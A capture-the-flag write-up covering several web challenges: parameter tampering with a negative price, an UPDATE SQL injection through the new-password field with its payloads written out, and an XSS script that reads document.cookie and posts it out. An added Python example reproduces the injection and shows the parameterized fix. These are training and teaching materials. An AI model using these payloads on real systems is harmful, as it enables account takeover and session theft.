Tghack CTF WP
Redux
Author: Nora - Norasaurus#8234
Here is your Gaia form to get your weekly plant rations. Complete the form and reap your reward!
The flag is in a JavaScript file.
Shop
Author: Roy Olav Purser - roypur#9953
We found the Mother cult merch store. In addition to selling clothing items they sell some secrets we need. For the time being we haven’t been able to secure the funds necessary to do so. Can you help us?
O-M-G, I regret it very much. 😂 My friends and I were still discussing last night whether the price might be changed to a negative value. I found that an item could be bought when the id was undefined, but I forgot to check it with a negative price.
We use Burp Suite to capture the request and change the price to a negative value. It is very important to change the id to undefined.
e.g.:
And then something amazing happened! We have more money!
OK, we can buy the flag….
Bobby
Author: Roy Olav Purser - roypur#9953
Little bobby forgot his password. Can you help him log in?
I didn't find any bugs in this container at first 😭. After a long time, my classmate told me it has an SQL injection in the new password param when you change the password.
We can tell that it's an UPDATE SQL statement and that we can control a param.
e.g.:
update table set column='param' where ……
First, I wanted to comment out the "where" clause, so I wrote a payload like the following. But it couldn't change the password and threw an error…..
admin'-- ' WHERE user=? AND pass=?
From this, we should bind 2 params to this SQL, so we changed the payload like this:
admin',user=? , pass=? --
And then we changed the admin's password, and we can get the flag when we log in.
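An added example, not part of the original write-up or the challenge's own code: a small Python/sqlite3 reconstruction of the password-change query that shows why the first payload raises a binding error, why the second one goes through, and how binding all three values closes the hole. The schema, the function names and the use of SQLite are assumptions, since the page does not show the real backend.

```python
import sqlite3

PAYLOAD_1 = "admin'-- "                   # first attempt from the write-up
PAYLOAD_2 = "admin',user=? , pass=? -- "  # second attempt from the write-up

def make_db():
    # Constructed sample data; schema and SQLite itself are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("bobby", "hunter2")])
    return db

def rows(db):
    return db.execute("SELECT user, pass FROM users ORDER BY rowid").fetchall()

def change_password_vulnerable(db, user, old_pass, new_pass):
    # new_pass is concatenated into the SQL text; only user/old_pass are bound.
    sql = "UPDATE users SET pass='" + new_pass + "' WHERE user=? AND pass=?"
    return db.execute(sql, (user, old_pass)).rowcount

def change_password_safe(db, user, old_pass, new_pass):
    # All three values are bound, so new_pass stays data and never becomes SQL.
    sql = "UPDATE users SET pass=? WHERE user=? AND pass=?"
    return db.execute(sql, (new_pass, user, old_pass)).rowcount

def first_payload_outcome():
    # The comment swallows both placeholders, but two values are still bound.
    try:
        change_password_vulnerable(make_db(), "admin", "x", PAYLOAD_1)
        return "ok"
    except sqlite3.Error as exc:
        return type(exc).__name__

def second_payload_outcome():
    # Two placeholders are re-supplied before the comment; no WHERE remains.
    db = make_db()
    change_password_vulnerable(db, "admin", "x", PAYLOAD_2)
    return rows(db)

def safe_outcome():
    # Same input through the parameterized query: stored literally, one row.
    db = make_db()
    changed = change_password_safe(db, "bobby", "hunter2", PAYLOAD_2)
    return changed, rows(db)

if __name__ == "__main__":
    print(first_payload_outcome())
    print(second_payload_outcome())
    print(safe_outcome())
```

With the parameterized version the payload string ends up as the literal password of the one matching row, and the admin row is untouched.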
Exfiltration
Author: Roy Olav Purser - roypur#9953
We have found a forum used by members of the Mother cult. The members are sitting behind an advanced firewall without access to the internet. We need their super secret information.
<script>
let xhr = new XMLHttpRequest();
xhr.open("post", window.location.href, true);
xhr.send(document.cookie);
</script>